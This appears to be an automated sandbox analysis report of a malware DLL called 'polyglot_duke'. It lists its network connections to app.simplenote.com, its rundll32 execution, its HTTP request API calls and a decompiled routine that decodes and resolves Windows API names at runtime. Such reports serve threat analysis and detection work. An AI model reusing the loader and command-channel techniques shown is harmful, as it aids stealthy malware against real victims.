                                                                                                                                                Feb 22, 2021 23:45:43.197686911 CET216.239.32.21443192.168.2.649969CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:47.982942104 CET216.239.32.21443192.168.2.649979CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:52.399276972 CET216.239.32.21443192.168.2.649988CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:57.040079117 CET216.239.32.21443192.168.2.649997CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                Analysis Process: loaddll64.exe PID: 6992 Parent PID: 5904

                                                                                                                                                General

                                                                                                                                                Start time:23:43:55
                                                                                                                                                Start date:22/02/2021
                                                                                                                                                Path:C:\Windows\System32\loaddll64.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:loaddll64.exe 'C:\Users\user\Desktop\unmapped_executable_of_polyglot_duke.dll'
                                                                                                                                                Imagebase:0x7ff69d550000
                                                                                                                                                File size:147456 bytes
                                                                                                                                                MD5 hash:40E30D559A47CDA935973FA18C34ABA6
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: rundll32.exe PID: 7048 Parent PID: 6992

                                                                                                                                                General

                                                                                                                                                Start time:23:43:55
                                                                                                                                                Start date:22/02/2021
                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\unmapped_executable_of_polyglot_duke.dll,InitSvc
                                                                                                                                                Imagebase:0x7ff6c2ba0000
                                                                                                                                                File size:69632 bytes
                                                                                                                                                MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >

                                                                                                                                                  Analysis Process: rundll32.exe PID: 7048 Parent PID: 6992 rundll32.exeCOMMON

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 67705440, Relevance: 105.4, APIs: 57, Strings: 3, Instructions: 398stringnetworkfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 6770548C
                                                                                                                                                  • InternetConnectA.WININET ref: 677057E7
                                                                                                                                                  • HttpOpenRequestA.WININET ref: 67705827
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 6770584B
                                                                                                                                                  • HttpAddRequestHeadersA.WININET ref: 67705860
                                                                                                                                                  • GetDesktopWindow.USER32 ref: 67705890
                                                                                                                                                  • InternetErrorDlg.WININET ref: 677058B0
                                                                                                                                                  • CloseHandle.KERNEL32 ref: 677058BB
                                                                                                                                                  • HttpSendRequestA.WININET ref: 677058E3
                                                                                                                                                  • realloc.LIBCMT ref: 6770598F
                                                                                                                                                  • free.LIBCMT ref: 6770586E
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • HttpSendRequestA.WININET ref: 67705884
                                                                                                                                                  • HttpQueryInfoA.WININET ref: 67705914
                                                                                                                                                  • InternetReadFile.WININET ref: 6770595D
                                                                                                                                                  • malloc.LIBCMT ref: 677054B6
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                    • Part of subcall function 67707984: _errno.LIBCMT ref: 6770799C
                                                                                                                                                    • Part of subcall function 67707984: _invalid_parameter_noinfo.LIBCMT ref: 677079A8
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67705557
                                                                                                                                                  • malloc.LIBCMT ref: 67705562
                                                                                                                                                  • lstrcpynA.KERNEL32 ref: 67705579
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67705582
                                                                                                                                                  • malloc.LIBCMT ref: 6770558D
                                                                                                                                                  • lstrcpynA.KERNEL32 ref: 677055A0
                                                                                                                                                  • free.LIBCMT ref: 677055B0
                                                                                                                                                  • free.LIBCMT ref: 677055BE
                                                                                                                                                  • free.LIBCMT ref: 677055C6
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 677055E8
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 677055F3
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 677055FE
                                                                                                                                                  • realloc.LIBCMT ref: 6770560E
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 67705625
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 67705631
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 67705641
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 6770564D
                                                                                                                                                    • Part of subcall function 67706E2C: free.LIBCMT ref: 67706E72
                                                                                                                                                    • Part of subcall function 67706E2C: free.LIBCMT ref: 67706EA0
                                                                                                                                                  • free.LIBCMT ref: 67705688
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 677056B7
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 677056C2
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 677056CD
                                                                                                                                                  • realloc.LIBCMT ref: 677056DD
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 677056F4
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 67705700
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 67705710
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 6770571C
                                                                                                                                                  • free.LIBCMT ref: 67705725
                                                                                                                                                  • free.LIBCMT ref: 6770572F
                                                                                                                                                  • InternetOpenA.WININET ref: 6770574E
                                                                                                                                                  • free.LIBCMT ref: 6770575A
                                                                                                                                                  • calloc.LIBCMT ref: 67705767
                                                                                                                                                  • InternetSetOptionA.WININET ref: 67705791
                                                                                                                                                  • InternetSetOptionA.WININET ref: 677057A5
                                                                                                                                                  • InternetSetOptionA.WININET ref: 677057B9
                                                                                                                                                  • malloc.LIBCMT ref: 67705980
                                                                                                                                                  • InternetReadFile.WININET ref: 677059D3
                                                                                                                                                  • InternetCloseHandle.WININET ref: 677059E0
                                                                                                                                                  • InternetCloseHandle.WININET ref: 677059EB
                                                                                                                                                  • InternetCloseHandle.WININET ref: 677059F4
                                                                                                                                                  • free.LIBCMT ref: 677059FF
                                                                                                                                                  • free.LIBCMT ref: 67705A09
                                                                                                                                                  • free.LIBCMT ref: 67705A1D
                                                                                                                                                    • Part of subcall function 67701000: malloc.LIBCMT ref: 67701053
                                                                                                                                                  Strings
                                                                                                                                                  • 98485f8abd8d93824f4853e848756ff14b451bb89c8cda2f2c316ed798528c20fc0a1b28b0fc52bd7cdfc857312f2714, xrefs: 67705839
                                                                                                                                                  • GET, xrefs: 67705810
                                                                                                                                                  • U1, xrefs: 6770573F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$Internet$lstrlen$lstrcat$Httpmalloc$CloseHandleRequest_errno$Optionrealloc$ErrorFileHeapOpenReadSendlstrcpyn$AgentAllocateConnectDesktopFreeHeadersInfoLastObtainQueryStringUserWindow_callnewh_invalid_parameter_noinfocalloc
                                                                                                                                                  • String ID: 98485f8abd8d93824f4853e848756ff14b451bb89c8cda2f2c316ed798528c20fc0a1b28b0fc52bd7cdfc857312f2714$GET$U1
                                                                                                                                                  • API String ID: 2098953756-2877966207
                                                                                                                                                  • Opcode ID: cde03c865b2f94ff9aad4bd3edaf33a2e5075a222ecf2d4d01ade57a8223121a
                                                                                                                                                  • Instruction ID: af7880c163cb53808aa256aac42e7e15898f741bc0d4b63af46ca5f5f5a5aa10
                                                                                                                                                  • Opcode Fuzzy Hash: cde03c865b2f94ff9aad4bd3edaf33a2e5075a222ecf2d4d01ade57a8223121a
                                                                                                                                                  • Instruction Fuzzy Hash: 0DF1BEB131864186EB048B26F958B6AA7E2FBD9BDCF844425DE4A47B18EF3DC149C700
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677016F8, Relevance: 46.8, APIs: 31, Instructions: 350libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                  			E677016F8(void* __edi, void* __esp, long long __rbx, signed long long* __rcx, long long __rsi, void* __r9) {
				void* __rdi;
				void* __rbp;
				int _t70;
				signed int _t151;
				signed int _t153;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				signed long long _t204;
				signed long long _t205;
				signed long long _t208;
				signed long long _t219;
				signed long long _t220;
				signed long long _t221;
				void* _t314;
				signed long long _t326;
				signed long long _t329;
				signed long long* _t358;
				void* _t361;
				void* _t363;
				void* _t379;
				void* _t381;

				_t206 = __rbx;
				 *((long long*)(_t363 + 0x10)) = __rbx;
				 *((long long*)(_t363 + 0x18)) = __rsi;
				_push(_t379);
				_push(_t381);
				_t361 = _t363 - 0x150;
				_t364 = _t363 - 0x250;
				_t204 =  *0x67716000; // 0x9b7b11e8241
				_t205 = _t204 ^ _t363 - 0x00000250;
				 *(_t361 + 0x140) = _t205;
				r12d = 0;
				_t358 = __rcx;
				if(__rcx == 0) {
					L19:
					__eflags = 0;
				} else {
					r13d = 0x10b;
					_t151 = r13d;
					r14d = _t381 + 3;
					_t70 = memset(__edi, 0, _t151 << 0);
					_t173 = __edi + _t151;
					_t153 = r14d;
					memset(_t173, _t70, _t153 << 0);
					_t181 = __esp + 0x18;
					_t174 = _t173 + _t153;
					E67703BE0(0, _t174, _t181, __rbx, _t314, _t366);
					_t187 = _t205;
					if(_t205 != 0) {
						_t10 = _t361 + 0x30; // 0x13b
						E67707984(r14d, _t205, _t10, _t314, _t205);
						_t366 = "\\";
						_t11 = _t361 + 0x30; // 0x13b
						E677070DC(_t205, _t11, _t314, "\\");
						free(??);
					}
					E67703938(0xc, _t181, _t205, _t206, 0x677172c0, _t358, _t366);
					E677044F8(0, 0xc, _t174, _t181, _t187, _t205, _t206, _t205, _t314, _t358, _t361); // executed
					_t208 = _t205;
					E677039E8(_t174, _t181, _t205, _t208, _t205, _t205);
					_t12 = _t361 + 0x30; // 0x13b
					E67707984(0xc, _t205, _t364 + 0x20, _t381, _t12);
					_t368 = _t208;
					_t316 = _t381;
					E677070DC(_t205, _t364 + 0x20, _t381, _t208);
					free(??);
					LoadLibraryA(??); // executed
					 *_t358 = _t205;
					memset(_t174, 0, 0 << 0);
					_t182 = _t181 + 0xc;
					_t175 = _t174;
					_t150 = 0;
					_t188 = _t205;
					if(_t205 != 0) {
						_t18 = _t205 + 0x14; // 0x14
						E67703938(_t18, _t182, _t205, _t208, 0x67717310, _t358, _t368);
						_t209 = _t205;
						E677044F8(0, _t18, _t175, _t182, _t188, _t205, _t205, _t205, _t316, _t358, _t361);
						GetProcAddress(??, ??);
						_t358[8] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						E67703938(0x11, _t182, _t205, _t209, 0x67717380, _t358, _t368);
						_t210 = _t205;
						E677044F8(0, 0x11, _t175, _t182, _t188, _t205, _t205, _t205, _t205, _t358, _t361);
						GetProcAddress(??, ??);
						_t358[5] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						E67703938(0x17, _t182, _t205, _t210, 0x67717398, _t358, _t368);
						_t211 = _t205;
						E677044F8(0, 0x17, _t175, _t182, _t188, _t205, _t205, _t205, _t205, _t358, _t361);
						GetProcAddress(??, ??);
						_t358[0xc] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						E67703938(0x11, _t182, _t205, _t211, 0x677172e8, _t358, _t368);
						_t212 = _t205;
						E677044F8(0, 0x11, _t175, _t182, _t188, _t205, _t205, _t205, _t205, _t358, _t361);
						GetProcAddress(??, ??);
						_t358[6] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						E67703938(0x11, _t182, _t205, _t212, 0x67717328, _t358, _t368);
						_t213 = _t205;
						E677044F8(0, 0x11, _t175, _t182, _t188, _t205, _t205, _t205, _t205, _t358, _t361);
						GetProcAddress(??, ??);
						_t358[0xa] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						E67703938(0x11, _t182, _t205, _t213, 0x67717358, _t358, _t368);
						_t214 = _t205;
						E677044F8(0, 0x11, _t175, _t182, _t188, _t205, _t205, _t205, _t205, _t358, _t361);
						GetProcAddress(??, ??);
						_t358[7] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						E67703938(0xe, _t182, _t205, _t214, 0x67717370, _t358, _t368);
						_t215 = _t205;
						E677044F8(0, 0xe, _t175, _t182, _t188, _t205, _t205, _t205, _t205, _t358, _t361);
						GetProcAddress(??, ??);
						_t358[3] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						E67703938(0x13, _t182, _t205, _t215, 0x677173b0, _t358, _t368);
						_t216 = _t205;
						E677044F8(0, 0x13, _t175, _t182, _t188, _t205, _t205, _t205, _t205, _t358, _t361);
						GetProcAddress(??, ??);
						_t358[0xb] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						E67703938(0xf, _t182, _t205, _t216, 0x677173d8, _t358, _t368);
						_t217 = _t205;
						E677044F8(0, 0xf, _t175, _t182, _t188, _t205, _t205, _t205, _t205, _t358, _t361);
						GetProcAddress(??, ??);
						_t358[9] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						E67703938(0x11, _t182, _t205, _t217, 0x677172a8, _t358, _t368);
						_t218 = _t205;
						E677044F8(0, 0x11, _t175, _t182, _t188, _t205, _t205, _t205, _t205, _t358, _t361);
						_t326 = _t205;
						GetProcAddress(??, ??);
						_t358[4] = _t205;
						E677039E8(_t175, _t182, _t205, _t205, _t205, _t205);
						free(??);
						if(_t358[3] == _t379 || _t358[4] == _t379 || _t358[5] == _t379 || _t358[6] == _t379 || _t358[7] == _t379 || _t358[8] == _t379 || _t358[9] == _t379 || _t358[0xa] == _t379 || _t358[0xb] == _t379) {
							goto L19;
						} else {
							_t198 = _t358[0xc] - _t379;
							if(_t358[0xc] == _t379) {
								goto L19;
							} else {
								E67703938(0xb, _t182, _t205, _t218, 0x67717300, _t358, _t368);
								E677044F8(0, 0xb, _t175, _t182, _t198, _t205, _t218, _t205, _t326, _t358, _t361);
								_t219 = _t205;
								E677039E8(_t175, _t182, _t205, _t219, _t205, _t205);
								_t39 = _t361 + 0x30; // 0x13b
								E67707984(0xb, _t205, _t364 + 0x20, _t381, _t39);
								_t370 = _t219;
								_t328 = _t381;
								E677070DC(_t205, _t364 + 0x20, _t381, _t219);
								free(??);
								LoadLibraryA(??); // executed
								_t358[1] = _t205;
								memset(_t175, 0, 0 << 0);
								_t183 = _t182 + 0xc;
								_t176 = _t175;
								_t150 = 0;
								_t199 = _t205;
								if(_t205 != 0) {
									_t46 = _t205 + 0x16; // 0x16
									E67703938(_t46, _t183, _t205, _t219, 0x677172d0, _t358, _t370);
									E677044F8(0, _t46, _t176, _t183, _t199, _t205, _t219, _t205, _t328, _t358, _t361);
									_t220 = _t205;
									E677039E8(_t176, _t183, _t205, _t220, _t205, _t205);
									_t329 = _t220;
									GetProcAddress(??, ??);
									_t358[0xd] = _t205;
									free(??);
									_t200 = _t358[0xd] - _t379;
									if(_t358[0xd] == _t379) {
										goto L19;
									} else {
										E67703938(0xc, _t183, _t205, _t220, 0x677173c8, _t358, _t370);
										E677044F8(0, 0xc, _t176, _t183, _t200, _t205, _t220, _t205, _t329, _t358, _t361);
										_t221 = _t205;
										E677039E8(_t176, _t183, _t205, _t221, _t205, _t205);
										_t50 = _t361 + 0x30; // 0x13b
										E67707984(0xc, _t205, _t364 + 0x20, _t381, _t50);
										_t372 = _t221;
										_t331 = _t381;
										E677070DC(_t205, _t364 + 0x20, _t381, _t221);
										free(??);
										LoadLibraryA(??);
										_t358[2] = _t205;
										memset(_t176, 0, 0 << 0);
										_t184 = _t183 + 0xc;
										_t177 = _t176;
										_t150 = 0;
										_t201 = _t205;
										if(_t205 != 0) {
											_t57 = _t205 + 0x11; // 0x11
											E67703938(_t57, _t184, _t205, _t221, 0x67717340, _t358, _t372);
											E677044F8(0, _t57, _t177, _t184, _t201, _t205, _t221, _t205, _t331, _t358, _t361);
											E677039E8(_t177, _t184, _t205, _t205, _t205, _t205);
											GetProcAddress(??, ??);
											_t358[0xe] = _t205;
											free(??);
											if(_t358[0xe] == _t379) {
												goto L19;
											} else {
												memset(_t177, 0, 0 << 0);
												_t150 = 0;
											}
										}
									}
								}
							}
						}
					}
				}
				return E67706F80(_t150,  *(_t361 + 0x140) ^ _t364);
			}































                                                                                                                                                  0x677016f8
                                                                                                                                                  0x677016f8
                                                                                                                                                  0x677016fd
                                                                                                                                                  0x67701704
                                                                                                                                                  0x67701706
                                                                                                                                                  0x6770170a
                                                                                                                                                  0x67701712
                                                                                                                                                  0x67701719
                                                                                                                                                  0x67701720
                                                                                                                                                  0x67701723
                                                                                                                                                  0x6770172a
                                                                                                                                                  0x6770172d
                                                                                                                                                  0x67701733
                                                                                                                                                  0x67701c62
                                                                                                                                                  0x67701c62
                                                                                                                                                  0x67701739
                                                                                                                                                  0x6770173b
                                                                                                                                                  0x67701746
                                                                                                                                                  0x67701749
                                                                                                                                                  0x6770174d
                                                                                                                                                  0x6770174d
                                                                                                                                                  0x67701753
                                                                                                                                                  0x67701756
                                                                                                                                                  0x67701756
                                                                                                                                                  0x67701756
                                                                                                                                                  0x67701758
                                                                                                                                                  0x67701760
                                                                                                                                                  0x67701763
                                                                                                                                                  0x67701765
                                                                                                                                                  0x6770176f
                                                                                                                                                  0x67701774
                                                                                                                                                  0x6770177b
                                                                                                                                                  0x67701782
                                                                                                                                                  0x6770178a
                                                                                                                                                  0x6770178a
                                                                                                                                                  0x6770179b
                                                                                                                                                  0x677017a6
                                                                                                                                                  0x677017ae
                                                                                                                                                  0x677017b1
                                                                                                                                                  0x677017b6
                                                                                                                                                  0x677017c2
                                                                                                                                                  0x677017cc
                                                                                                                                                  0x677017cf
                                                                                                                                                  0x677017d2
                                                                                                                                                  0x677017da
                                                                                                                                                  0x677017e4
                                                                                                                                                  0x677017f5
                                                                                                                                                  0x677017fa
                                                                                                                                                  0x677017fa
                                                                                                                                                  0x677017fa
                                                                                                                                                  0x677017fa
                                                                                                                                                  0x677017fc
                                                                                                                                                  0x677017ff
                                                                                                                                                  0x67701805
                                                                                                                                                  0x6770180f
                                                                                                                                                  0x67701817
                                                                                                                                                  0x6770181a
                                                                                                                                                  0x67701828
                                                                                                                                                  0x67701831
                                                                                                                                                  0x67701835
                                                                                                                                                  0x6770183d
                                                                                                                                                  0x6770184e
                                                                                                                                                  0x67701856
                                                                                                                                                  0x67701859
                                                                                                                                                  0x67701867
                                                                                                                                                  0x67701870
                                                                                                                                                  0x67701874
                                                                                                                                                  0x6770187c
                                                                                                                                                  0x6770188d
                                                                                                                                                  0x67701895
                                                                                                                                                  0x67701898
                                                                                                                                                  0x677018a6
                                                                                                                                                  0x677018af
                                                                                                                                                  0x677018b3
                                                                                                                                                  0x677018bb
                                                                                                                                                  0x677018cc
                                                                                                                                                  0x677018d4
                                                                                                                                                  0x677018d7
                                                                                                                                                  0x677018e5
                                                                                                                                                  0x677018ee
                                                                                                                                                  0x677018f2
                                                                                                                                                  0x677018fa
                                                                                                                                                  0x6770190b
                                                                                                                                                  0x67701913
                                                                                                                                                  0x67701916
                                                                                                                                                  0x67701924
                                                                                                                                                  0x6770192d
                                                                                                                                                  0x67701931
                                                                                                                                                  0x67701939
                                                                                                                                                  0x6770194a
                                                                                                                                                  0x67701952
                                                                                                                                                  0x67701955
                                                                                                                                                  0x67701963
                                                                                                                                                  0x6770196c
                                                                                                                                                  0x67701970
                                                                                                                                                  0x67701978
                                                                                                                                                  0x67701989
                                                                                                                                                  0x67701991
                                                                                                                                                  0x67701994
                                                                                                                                                  0x677019a2
                                                                                                                                                  0x677019ab
                                                                                                                                                  0x677019af
                                                                                                                                                  0x677019b7
                                                                                                                                                  0x677019c8
                                                                                                                                                  0x677019d0
                                                                                                                                                  0x677019d3
                                                                                                                                                  0x677019e1
                                                                                                                                                  0x677019ea
                                                                                                                                                  0x677019ee
                                                                                                                                                  0x677019f6
                                                                                                                                                  0x67701a07
                                                                                                                                                  0x67701a0f
                                                                                                                                                  0x67701a12
                                                                                                                                                  0x67701a20
                                                                                                                                                  0x67701a29
                                                                                                                                                  0x67701a2d
                                                                                                                                                  0x67701a35
                                                                                                                                                  0x67701a46
                                                                                                                                                  0x67701a4e
                                                                                                                                                  0x67701a51
                                                                                                                                                  0x67701a59
                                                                                                                                                  0x67701a5f
                                                                                                                                                  0x67701a68
                                                                                                                                                  0x67701a6c
                                                                                                                                                  0x67701a74
                                                                                                                                                  0x67701a7d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701ad3
                                                                                                                                                  0x67701ad3
                                                                                                                                                  0x67701ad7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701add
                                                                                                                                                  0x67701ae9
                                                                                                                                                  0x67701af4
                                                                                                                                                  0x67701afc
                                                                                                                                                  0x67701aff
                                                                                                                                                  0x67701b04
                                                                                                                                                  0x67701b10
                                                                                                                                                  0x67701b1a
                                                                                                                                                  0x67701b1d
                                                                                                                                                  0x67701b20
                                                                                                                                                  0x67701b28
                                                                                                                                                  0x67701b32
                                                                                                                                                  0x67701b43
                                                                                                                                                  0x67701b49
                                                                                                                                                  0x67701b49
                                                                                                                                                  0x67701b49
                                                                                                                                                  0x67701b49
                                                                                                                                                  0x67701b4b
                                                                                                                                                  0x67701b4e
                                                                                                                                                  0x67701b54
                                                                                                                                                  0x67701b5e
                                                                                                                                                  0x67701b69
                                                                                                                                                  0x67701b71
                                                                                                                                                  0x67701b74
                                                                                                                                                  0x67701b7d
                                                                                                                                                  0x67701b80
                                                                                                                                                  0x67701b89
                                                                                                                                                  0x67701b8d
                                                                                                                                                  0x67701b92
                                                                                                                                                  0x67701b96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701b9c
                                                                                                                                                  0x67701ba8
                                                                                                                                                  0x67701bb3
                                                                                                                                                  0x67701bbb
                                                                                                                                                  0x67701bbe
                                                                                                                                                  0x67701bc3
                                                                                                                                                  0x67701bcf
                                                                                                                                                  0x67701bd9
                                                                                                                                                  0x67701bdc
                                                                                                                                                  0x67701bdf
                                                                                                                                                  0x67701be7
                                                                                                                                                  0x67701bf1
                                                                                                                                                  0x67701c02
                                                                                                                                                  0x67701c08
                                                                                                                                                  0x67701c08
                                                                                                                                                  0x67701c08
                                                                                                                                                  0x67701c08
                                                                                                                                                  0x67701c0a
                                                                                                                                                  0x67701c0d
                                                                                                                                                  0x67701c0f
                                                                                                                                                  0x67701c19
                                                                                                                                                  0x67701c24
                                                                                                                                                  0x67701c2f
                                                                                                                                                  0x67701c3b
                                                                                                                                                  0x67701c44
                                                                                                                                                  0x67701c48
                                                                                                                                                  0x67701c51
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701c53
                                                                                                                                                  0x67701c5c
                                                                                                                                                  0x67701c5c
                                                                                                                                                  0x67701c5e
                                                                                                                                                  0x67701c51
                                                                                                                                                  0x67701c0d
                                                                                                                                                  0x67701b96
                                                                                                                                                  0x67701b4e
                                                                                                                                                  0x67701ad7
                                                                                                                                                  0x67701a7d
                                                                                                                                                  0x677017ff
                                                                                                                                                  0x67701c8e

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67703BE0: GetSystemDirectoryA.KERNEL32 ref: 67703C09
                                                                                                                                                  • free.LIBCMT ref: 6770178A
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • free.LIBCMT ref: 677017DA
                                                                                                                                                  • LoadLibraryA.KERNELBASE ref: 677017E4
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 67701828
                                                                                                                                                  • free.LIBCMT ref: 6770183D
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 67701867
                                                                                                                                                  • free.LIBCMT ref: 6770187C
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 677018A6
                                                                                                                                                  • free.LIBCMT ref: 677018BB
                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 677018E5
                                                                                                                                                  • free.LIBCMT ref: 677018FA
